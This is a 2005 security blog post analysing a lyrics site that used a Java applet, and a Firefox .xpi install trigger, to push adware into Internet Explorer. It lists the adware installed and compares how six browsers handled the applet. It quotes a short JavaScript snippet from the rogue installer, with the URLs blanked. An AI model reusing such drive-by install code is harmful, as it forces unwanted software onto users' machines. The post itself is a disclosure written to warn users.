Categories

BitTorrent
Conferences
Direct Revenue
Julie Amero
Myspace
Podcasts
Postbag
The Big Ones
The Fourth Wall
Yapbrowser
Zango

Creative Commons License
All articles licensed
under a Creative
Commons License.  








Home | About me | Press | The Fourth Wall | Links

Wednesday, March 09, 2005

Firefox Spyware infects IE?

What if there was an infection out there that could bypass Firefox and still get its grubby little paws on IE, and from there, the heart of your OS? What if that same infection could get past not only FF, but a whole raft of other (supposedly more secure) browsers too?

What if, of all people, Neil Diamond was indirectly involved in this craziness?

Unfortunately, this has now become a reality and woe betide anyone looking for lyrics from Neil's latest hit. You're more likely to end up with a nasty case of browseritis. After hearing rumours of a "Firefox Adware bundle" from this thread, I thought I'd go check it out. The results were, as they say, a right kick in the pants.

But how could this happen?

The answer is, some sneaky coding is being used to get around your browser of choice (whatever that may be). Upon visiting the target website, nothing happens. Nothing that is, unless you have Sun Java Runtime Environment installed on the host machine. And seeing how everyone is being urged to turn away from Microsoft's Java in favour of Sun's version, this could spell problems for browsers currently lording it over IE.

Think you're safe because you're not actually using IE? Think you're safe because you have IE locked down tight with HOST files, Spywareblaster and the inbuilt security settings cranked up to the max? Wrong. This is a shot of IE with the infection domain already added to the "Restricted Sites" zone in Internet Options. Note the "ironic" affiliate banner for Firefox.

So far, so good. Using IE, nothing is getting through. And using Firefox (or some other "secure" browser) will keep me totally secure, yes?...

...well, not exactly. Visit the same page in FF and, with the JRE up and running, the below happens (click here for a bigger view of the webpage):



Being a curious soul, I agreed to the install - and quickly wished I hadn't! In a flurry of remote downloads, numerous changes to the registry took place and a sizeable amount of IE specific installs began downloading. Amongst the assortment was DyFuCA, Internet Optimizer, ISTsvc, Kapabout, sais (180 Solutions), SideFind, Avenue Media and something called djtopr1150.exe lurking in the Temp folder.

Imagine my surprise when, unnanounced, IE then suddenly opens up without me doing anything and looks like this:



Congratulations! Your PC is boned!

It goes without saying that, apart from Webrebates opening up adverts in the bottom right hand corner, whole swathes of entries in my favourites advertising "Adware removers" that also sell popup blockers (with popups!), Powerscan which loads at startup, yelling "DON'T GET CAUGHT WITH PORN ON YOUR PC!", a Sidefind bar that doesn't actually do very much and an MTV toolbar to keep the kids quiet, there was my jaw being slowly scraped off the floor as I realised in that instant that for all Firefox's bravado, it had been cut down dead in an instant by what would normally be a bunch of rather average Adware installs.

The problem is, IE shouldn't have been hit in this way - especially as it was locked down so tightly, and wasn't even being used at the time. Vaguely worried by this, I tried some other browsers...the results aren't exactly fantastic reading for the Mozilla Foundation (or anyone else, for that matter):

Firefox 1.0.1 - The install works.
Mozilla - The install works.
Avant browser 10.0 (build 153) - The install works.
Netscape 7.2 - The damn thing kept crashing, but eventually I was able to discover that the install works.
NetCaptor 7.5.4 - The install is blocked.
Opera 7.5.4 - The install is blocked.

Only two out of six had the good sense to steer clear of even asking the user if they wanted to install the applet. Not exactly a dazzling result.

(And it's since been confirmed by Daniel Veditz, owner of the Security Group over at the Mozilla Foundation, that this will indeed work in Opera with the right permissions enabled - though to date, I still haven't been able to get this to work. More here).

So how is this happening? The developers of this install are using the Java Runtime Environment, the initial installer taking the form of a Java applet rather than an Active X component inherent to IE alone. In this way, if the browser being used can recognise and install the applet, then it doesn't seem to matter what browser you're using, or (more worryingly) how tight your IE security is. And for those of you at the back, here's the .Jar file in all its cached glory (you'll have to put up with a clickable link for this one, it wouldn't fit on the page!) I should also point out that deleting the .Jar file from the Cache using the Java console will not remove the numerous IE Spyware and system infections now loaded onto your PC. This will only remove the initial installer.

Does this mean the Emperor's new clothes syndrome has hit Firefox? Possibly not, though it doesn't take a genius to work out that if "The Browser you Can Trust" now has to keep one eye on its older, slightly clumsier brother as well as watch its own back then there's a very good chance its tail could be getting ready for the mother of all burnings.

Update - 24/03/2005

I always maintained that the original Lyriscpy website did not try to load up any firefox specific Spyware, as a direct response to the Tom Coyote "Theory" thread (note I was the first on there to point out Java was to blame) - though I stood by my stance that this was a "browser issue" (and stand by that, as now the Opera developers have said they are going to change the way their browser handles Java too. Expect more to follow suit).

However - it turns out that Firefox specific spyware was involved in the Lyricspy page - and who pointed this out to me?

Someone from a Firefox forum!

In my original tests, I found that disabling software installs in firefox would send the page into a tailspin - and i couldnt figure out why. Someone from a Firefox forum suggested that this behaviour only happens when a Firefox specific install (in other words - an XPI) is attempted. Check out the below, lifted from the Javascript installer served from ysbweb.com:


if (InstallTrigger.updateEnabled()) {
InstallTrigger.install({'Content Access Plugin 1.01' : ''});
} else { location.replace(''); }

The code above tries to load in a piece of rogue firefox .xpi. This is a rather crude .xpi installer to load xxx toolbar into IE - its currently being examined by some of our "file curious" members.

By chance, I happened to stumble upon a bunch of other sites that (last year) tried similar .xpi installs, which mozilla put out a fix for, rather quickly. Upon revisiting these sites - they now all use the Java applet alongside the .xpi install, and its possible the .Xpi's have been updated, which is why they're now currently being looked at (to see how they work alongside the java).

So after all the chaos and "browser warring" that erupted over this whole thing, it actually turns out there was "Firefox spyware" buried away in the code (or at least, an installer that seems to attempt to change an obscure setting in Firefox regarding certificates along with serving up xxx toolbar into IE), and it was brought to light by none other than a Firefox forum member!

So it seems my title was rather more accurate than anyone gave me credit for, myself included...because the answer to my (perfectly reasonable) question, sadly, was yes.

It's just a shame certain individuals felt the need to jump all over me beforehand.

Labels:

posted by paperghost at 9:36 PM | Digg it!

All Content © Vitalsecurity.org 2006. The content of this site is entirely the opinion of Paperghost, and is in no way endorsed by FaceTime Communications. In other words - have a problem, come see me.